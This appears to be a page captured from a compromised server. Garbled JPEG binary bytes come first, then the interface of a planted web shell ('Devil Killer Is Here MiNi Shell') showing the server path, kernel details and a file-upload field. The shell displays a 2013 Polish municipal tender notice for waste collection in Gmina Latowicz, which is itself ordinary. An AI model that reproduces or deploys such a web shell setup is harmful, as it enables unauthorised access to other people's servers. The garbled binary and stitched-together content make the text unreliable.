JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130515/77059-N-2013.html

<p class="kh_header"><b>Latowicz: Odbieranie odpadów komunalnych od właścicieli nieruchomości zamieszkałych
na terenie gminy Latowicz i ich zagospodarowanie.</b><br>
<b>Numer ogłoszenia: 77059 - 2013; data zamieszczenia: 15.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Latowicz , ul. Rynek 6, 05-334 Latowicz, woj. mazowieckie, tel. 025 7521080 w. 15, faks 025 7521080 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.pl/regionlatowicki</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie odpadów komunalnych od właścicieli nieruchomości zamieszkałych
na terenie gminy Latowicz i ich zagospodarowanie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja usługi odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie gminy Latowicz i ich zagospodarowania.
2. Wyposażenie na terenie gminy Latowicz punktu selektywnego zbierania odpadów komunalnych, zwanego w dalszej części PSZOK od mieszkańców zamieszkałych w urządzenia do selektywnego gromadzenia odpadów -kontenery-pojemniki- oraz odbiór i zagospodarowanie tych odpadów.
3. Usługa odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie gminy Latowicz i ich zagospodarowania, obejmuje:
1) odbieranie odpadów komunalnych niesegregowanych -zmieszanych-,
2) odbieranie odpadów zbieranych selektywnie, w tym;
a) makulatury -papieru i tektury-,  
b) szkła i opakowań wielomateriałowych,
c) tworzyw sztucznych i metalu,
d) ulegających biodegradacji, w tym odpadów opakowaniowych ulegających biodegradacji  oraz odpadów zielonych, 
e) zużytego sprzętu elektrycznego i elektronicznego,
f) wielkogabarytowych i zużytych opon,
od wszystkich właścicieli nieruchomości zamieszkałych na terenie Gminy Latowicz, zgodnie z wykazem nieruchomości. Wykaz nieruchomości zamieszkałych objętych przedmiotowym zamówieniem Zamawiający przekaże Wykonawcy w ciągu 10 dni od zawarcia umowy .W  trakcie realizacji umowy wykaz będzie na bieżąco aktualizowany -przez Zamawiającego i Wykonawcę-.
3) odbiór ww. odpadów komunalnych z pojemników-worków na odpady komunalne,
o pojemności i w kolorystyce określonej w obowiązującym Regulaminie utrzymania czystości i porządku na terenie gminy Latowicz, zwanym w dalszej części -regulaminem- stanowiącym załącznik nr 1 do SIWZ , z częstotliwością określoną w tym regulaminie oraz w załączniku nr 2 do SIWZ dotyczącego szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i zagospodarowania tych odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi.
4. Szacunkowa liczba obsługiwanych mieszkańców zamieszkałych - 5500
5. Powierzchnia gminy wynosi 114,15 km2.
6. Obszar gminy obejmuje 18 miejscowości.
7. Przewidywana ilość wytworzonych odpadów komunalnych, którą trzeba będzie odebrać i zagospodarować - 1200 Mg na rok.
8. Ilość  wytworzonych odpadów należy traktować jako dane orientacyjne. Zostały one podane
w celu sporządzenia oferty. Faktyczne ilości odpadów mogą nie pokrywać się z podanymi przez Zamawiającego. Z tytułu zwiększenia ilości wywożonych odpadów Zamawiający nie będzie ponosił  dodatkowych kosztów.
9. Rozliczenie świadczonych usług wywozu odpadów komunalnych następować będzie -według ustalonej miesięcznej kwoty ryczałtowej odbioru odpadów z terenu Gminy Latowicz-, raz miesiącu, po zakończeniu miesiąca za który wystawiona jest faktura, z terminem płatności do 30 dni od przedłożenia faktury.

Do obowiązków Wykonawcy w szczególności należy:
1. Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami prawa: ustawą Prawo ochrony środowiska -Dz. U. z 2008 r. Nr 25, poz. 150- oraz rozporządzeniem wydanym na podstawie art. 9d ust. 2 ustawy z dnia 13 września 2012 r. o utrzymaniu czystości i porządku w gminach -tj. Dz. U. z 2012 r. poz. 391-.
2. Prowadzenie dokumentacji związanej z działalnością objętą zamówieniem,
tj. sporządzenie kwartalnych sprawozdań zawierających:
1) informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały one przekazane, 
2) informacje o masie odpadów komunalnych ulegających biodegradacji:
a) przekazanych do składowania na składowisku odpadów,
b) nieprzekazanych do składowania na składowisku odpadów i sposobie ich                 zagospodarowania;
3) liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne;
4) wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem -w tym nie zbierają selektywnie odpadów-,
3. Wykonawca przedkłada Zamawiającemu:
1) w terminie składania pierwszego sprawozdania -za okres VII, VIII, IX.2013 r.- wykaz wszystkich posesji, od których zostały odebrane odpady komunalne, wraz ze wskazaniem rodzaju, ilości i pojemności pojemników odebranych odpadów; 
2) informację o odebranych odpadach z PSZOK, w tym rodzaj i ilość oraz sposób zagospodarowania odpadów, wraz  ze wskazaniem instalacji, do której zostały one przekazane.
3) w uzasadnionych wypadkach, na żądanie Zamawiającego, Wykonawca przedstawi kopie dowodów dostarczania odpadów do instalacji odzysku lub unieszkodliwiania,
tj. karty ewidencji odpadów lub karty przekazania odpadów. 
4. Sprawozdania oraz wykazy, o których mowa powyżej, należy przekazywać  Zamawiającemu  w terminie do końca miesiąca następującego po kwartale, którego dotyczy.
5. Wykonawca jest zobowiązany do wyposażenia w okresie 30 dni od daty podpisania umowy   PSZOK w urządzenia -kontenery-pojemniki- do selektywnego gromadzenia poniższych rodzajów odpadów:
1) przeterminowane leki i chemikalia,
2) zużyte baterie i akumulatory,
3) zużyty sprzęt elektryczny i elektroniczny,
4) meble i inne odpady wielkogabarytowe,
5) odpady budowlane i rozbiórkowe,
6) zużyte opony,
7) metal,
6. Odbiór odpadów z PSZOK odbywać się będzie w miarę potrzeby po uprzednim telefonicznym zgłoszeniu przez Zamawiającego. Powyższe powinno zostać wykonane niezwłocznie po otrzymaniu zgłoszenia, jednak nie później niż w terminie 48 godzin od zgłoszenia.
7. W zakresie wymagań dotyczących pojemników na odpady komunalne:
1) umożliwienie właścicielom nieruchomości wynajmu, dzierżawy lub innej formy dysponowania pojemnikami do zbierania odpadów komunalnych.
2) zawarcia odrębnej umowy -poza przedmiotem niniejszego zamówienia- z właścicielami nieruchomości, jeżeli zgłoszą oni potrzebę wynajmu, dzierżawy lub innej formy  dysponowania pojemnikami, bez ponoszenia przez Gminę z tego tytułu żadnych kosztów.
3) wykonawca zobowiązany jest wyposażać nieodpłatnie przez cały okres świadczenia usługi będącej przedmiotem zamówienia każdą nieruchomość zamieszkałą
w odpowiednią ilość worków określoną w obowiązującym regulaminie. Worki powinny być wykonane z folii LDPE o odpowiedniej grubości dostosowanej do ilości i rodzaju odpadów, tak aby zapobiec ich rozrywaniu o pojemności od 60 do 120 l na odpady zbierane selektywnie tj. makulaturę -papier i tekturę-, szkło, tworzywa sztuczne, opakowania wielomateriałowe i metal, odpady ulegające biodegradacji w tym zielone, na pozostałe odpady z sortowania oraz na odpady niesegregowane -zmieszane-;   
4) pierwszy zestaw worków na wszystkie frakcje odpadów  Wykonawca musi dostarczyć najpóźniej w terminie do 7 dni od daty rozpoczęcia świadczenia usługi będącej przedmiotem niniejszego postępowania lub zgłoszenia nieruchomości do obsługi przez Zamawiającego.  
5) w trakcie odbierania odpadów Wykonawca pozostawia worki odpowiadające ilości oraz rodzajowi frakcji wystawionych przez właścicieli nieruchomości np. w przypadku odbioru jednego worka czarnego oraz zielonego ze szkłem Wykonawca zostawia jeden worek czarny oraz jeden z przeznaczeniem na szkło.
6) Zamawiający wymaga, aby Wykonawca w trakcie dostawy worków na nieruchomości przekazywał również właścicielom nieruchomości materiały informacyjne i edukacyjne dotyczące m.in. zasad selektywnej zbiórki odpadów oraz harmonogramy odbioru odpadów.
7) worki dostarczane przez Wykonawcę muszą posiadać oznaczenia określające nazwę Gminy, rodzaj frakcji odpadów, które należy w nich umieszczać oraz frakcji odpadów, których nie należy umieszczać. Oznaczenia muszą być dokonane w formie pisemnej
w języku polskim.
8) Wykonawca zobowiązany jest odebrać wszystkie odpady zgromadzone w pojemnikach/workach, jak i odpady pozostawione obok pojemników, a także odpady wysypane z pojemników w trakcie ich opróżniania, wywiane lub wyrzucone przez osoby trzecie -np. w wyniku aktów wandalizmu- i zwierzęta.
9) Wykonawca zobowiązany jest powiadomić Gminę o każdym przypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych. W przypadku niedopełnienia powyższego Wykonawca przyjmuje odpady jako zmieszane;
8. W zakresie częstotliwości i sposobu odbioru odpadów komunalnych:
Wykonawca będzie odbierał poszczególne frakcje odpadów komunalnych
z częstotliwością i w sposób zgodny z obowiązującym regulaminem oraz zapisami w załączniku nr 2 dotyczącym -szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i zagospodarowania tych odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi-.
9. Odbiór od właścicieli nieruchomości zamieszkałych odpadów wielkogabarytowych, zużytego sprzętu elektronicznego i elektrycznego -AGD i RTV-, zużytych opon - dwa razy
w roku w terminach do 30 kwietnia i do 31 października.  
10. W zakresie  dotyczącym  harmonogramu wywozu odpadów komunalnych:
1) dokonywanie odbioru odpadów komunalnych sprzed posesji zgodnie z określonym przez Wykonawcę, w porozumieniu z Zamawiającym, harmonogramem,
2) przedstawienie przez Wykonawcę do zatwierdzenia Zamawiającemu projektu harmonogramu, nie później niż w ciągu 14 dni od podpisania umowy. Wszelkie zmiany harmonogramu wymagają formy pisemnej, za wyjątkiem zmian jednorazowych wynikających z nadzwyczajnych sytuacji, np. powódź, gwałtowne opady śniegu,  nieprzejezdna droga, dni ustawowo wolne. We wszystkich przypadkach zmiana harmonogramu nastąpi po, co najmniej telefonicznym, uzgodnieniu między stronami.
O nowym terminie wywozu odpadów Wykonawca poinformuje właścicieli     nieruchomości. Zmiana harmonogramu nie stanowi zmiany umowy.
3) Harmonogram powinien być tak skonstruowany by odbiór był regularny i powtarzalny, co ułatwi mieszkańcom przygotowanie i wystawienie odpadów do odbioru.
4) Wykonawca jest zobowiązany do dostarczenia 1 egzemplarza harmonogramu w wersji papierowej w formie kalendarza każdemu właścicielowi nieruchomości zamieszkałej.

11. W zakresie transportu odpadów komunalnych:
1) zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości, 
2) zakaz odbioru odpadów w niedziele oraz dni ustawowo wolne od pracy. W przypadku, gdy dzień odbioru przypada w dzień ustawowo wolny od pracy, dniem odbioru odpadów są pierwsze dwa dni robocze następujące po dniu wolnym, 
3) odbieranie, w wyjątkowych sytuacjach, na zgłoszenie Zamawiającego, odpadów poza         ustalonym harmonogramem, jeżeli odpady te zostaną zebrane i zgromadzone na         nieruchomości w terminach innych niż przewiduje termin ich odbioru, a zagraża to         bezpieczeństwu życia i zdrowia mieszkańców,
4) zabezpieczenie przewożonych odpadów przed wysypaniem na drogę.

12. W zakresie zagospodarowania odpadów:
1) przekazywanie odebranych od właścicieli nieruchomości niesegregowanych -zmieszanych- odpadów  komunalnych, odpadów zielonych oraz pozostałości
z sortowania odpadów komunalnych do odzysku lub unieszkodliwiania na terenie instalacji regionalnych przynależnych do Ostrołęcko - Siedleckiego Regionu Gospodarki Odpadami Komunalnymi, wyznaczonych w -Wojewódzkim Planie Gospodarki Odpadami dla Województwa Mazowieckiego 2012-, w instalacjach spełniających wymagania najlepszej dostępnej techniki lub technologii, o której mowa
w art. 143 ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska -Dz.U. Nr 99, poz. 569 z poźn. zm.-
2) przekazywanie odebranych od właścicieli nieruchomości zamieszkałych selektywnie    zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów,       zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach -Dz.U. z 2013 r., poz. 21-.

13. Reklamacje
1) Gmina przekaże drogą e-mailowa Wykonawcy informację o otrzymanej od właścicieli nieruchomości reklamacji. Wykonawca ustosunkuje się do niej w ciągu 8 godzin roboczych od dnia otrzymania e-maila.
2) W przypadku zgłoszenia reklamacji do Wykonawcy, potraktuje on tę reklamację jak by została zgłoszona przez Gminę. Wykonawca poinformuje Gminę o każdej zgłoszonej do niego reklamacji.
3) Reklamacje niebudzące wątpliwości -np. brak odbioru odpadów zgodnie
z harmonogramem- zostaną przez Wykonawcę natychmiast uwzględnione, poprzez wykonanie usługi, bez wezwania Gminy.   
14. Inne obowiązki Wykonawcy:
1) wykonanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz ograniczający niedogodności dla mieszkańców gminy Latowicz do niezbędnego minimum,
2) zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania   umowy dostatecznej ilości środków technicznych, gwarantujących terminowe
i jakościowe wykonanie zakresu rzeczowego usługi, w ilości co najmniej takiej, jak
w złożonej w postępowaniu przetargowym ofercie,
3) porządkowanie terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami        wysypanymi z pojemników, kontenerów, worków i pojazdów w trakcie realizacji        usługi wywozu,
4) garażowanie pojazdów do realizacji przedmiotu zamówienia wyłącznie na terenie      posiadanej bazy magazynowo - transportowej,
5) wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież      ochronną z widocznym logo firmy,
6) Wykonawca zobowiązany jest do odbierania odpadów komunalnych niezależnie od wąskich oraz nieutwardzonych i utrudnionych dojazdów do posesji.
7) ponoszenie pełnej odpowiedzialności za należyte wykonanie powierzonych czynności   zgodnie z obowiązującymi przepisami i normami, 
8) okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających       wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego       wymaganiami i przepisami prawa, 
9) ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.20.00-9, 90.50.00.00-2, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zezwolenie na świadczenie usług w zakresie odbioru odpadów, lub wpis do rejestru           działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli           nieruchomości.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy       Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również          wykonywanych  usług w zakresie  niezbędnym do wykazania spełnienia warunku wiedzy
i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich  przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.
2.  Wykaz narzędzi, wyposażenie zakładu i urządzeń technicznych dostępnych           Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie           dysponowania tymi zasobami, w tym oświadczenie o:
a) dysponowaniu na terenie bazy magazynowo-transportowej urządzeniami do               selektywnego gromadzenia odpadów komunalnych przed transportem do miejsc                przetwarzania,
b) dysponowaniu bazą magazynowo-transportową usytuowaną w gminie, z terenu                 której odbiera te odpady, lub odległości nie większej niż 60 km od granicy tej                  gminy,
c) posiadaniu tytułu prawnego do terenu, na którym zlokalizowano bazę                 magazynowo- transportową.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
